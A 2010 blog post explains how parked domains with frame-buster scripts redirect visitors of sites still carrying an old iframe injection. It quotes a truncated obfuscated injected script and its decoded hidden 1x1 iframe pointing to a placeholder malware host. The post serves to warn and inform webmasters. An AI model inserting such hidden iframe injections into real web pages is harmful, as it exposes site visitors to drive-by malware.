Sunday, September 26, 2010

Domain Parks Hijacking Previously Hacked Sites?

Lately I've been seeing an increase in some domain parks using frame buster scripts and it really didn't make any sense to me.

Why would a domain park need a frame buster script?

Then I discovered a potential secret, these domain parks, whether intentional or not, are inadvertently hijacking sites that have been previously victims of the iframe injection hack!

Let's examine how this works.

The iframe injector exploit happens when a hacker adds a line of JavaScript to your page like this:

<script Language="Javascript">document.write(unescape('%3C%69%66%.....61%6D%65%3E'));</script>
That line of script translates the encrypted content in the unescape() command to something like this:
<iframe src="http://malware.location.example.com" width=1 height=1></iframe>

Once the search engines or browsers detect this problem then the victims site gets the normal safe surf malware warnings when visitors attempt to visit their pages as long as malware continues to exist on http://malware.location.example.com. However, once the malware is removed, often the hacked domains are shut down or abandoned and return to the domain park. The absence of malware at http://malware.location.example.com will stop displaying those safe surf warnings and everything looks normal again. Therefore, webmasters that never knew their sites were hacked in the first place, and never fixed the problem, are now potentially at the mercy of a domain park that employs frame busting.

If you didn't follow that, let's simplify it:

Some of the domain parks now add a FRAME BUSTER SCRIPT to their domain park pages.

Now any time a visitor goes to a site that was previously hacked and never repaired, and execute that JavaScript iframe injector code, the site is redirected to the domain park page.

You can see the frame buster script in the domain park pages:
function EscapeBrowserFrame(){ .... }
To add insult to injury, innocent webmasters were not only victims of hackers, but now they're the unwitting victims of having their sites hijacked by domain parks!

A nice double whammy!

Many sites have been hacked by server-wide exploits which have been documented previously in this very blog. It's very possible (most likely) the hosts never reported the problem to their customers so the website owners never knew they needed to fix their pages. This situation has probably left literally tens of thousands of sites vulnerable over time to being eventually hijacked.

That's the real kicker here is that the domain used to distribute malware could fall into the domain park at any time. Maybe the victims site will be hijacked today, maybe tomorrow, maybe a year from now, but the potential risk is great. If that line of JavaScript left by the hacker is allowed to stay in the victims website and the hackers site eventually falls into the right domain park, their site will also be hijacked.

Iframe injector scripts, the hackers gift that just keeps on giving!